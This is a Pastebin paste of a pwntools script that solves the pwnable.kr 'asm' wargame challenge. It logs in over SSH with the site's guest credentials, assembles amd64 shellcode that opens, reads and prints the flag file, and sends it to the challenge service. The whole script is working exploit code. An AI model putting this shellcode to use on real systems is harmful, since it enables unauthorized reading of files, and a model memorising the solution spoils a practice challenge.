Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- context(arch='amd64', os='linux')
- elf = ELF('./asm')
- flag_name = 'this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong'
- #''' for ssh connect
- sh = ssh(host = 'pwnable.kr', port = 2222, user = 'asm', password = 'guest' )
- #sh.download_file('asm')
- #s = sh.process('./asm')
- s = sh.connect_remote('localhost', 9026)
- #'''
- #s = process('./asm')
- raw_input('press_any_key')
- payload = ''
- payload += shellcraft.amd64.pushstr(flag_name)
- payload += shellcraft.amd64.open('rsp')
- payload += shellcraft.amd64.read('rax', 'rsp', 1024)
- payload += shellcraft.amd64.write(1, 'rsp', 1024)
- log.info(payload)
- payload = asm(payload)
- log.info(s.recvuntil("shellcode: "))
- s.send(payload)
- log.success(s.recv(1024))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement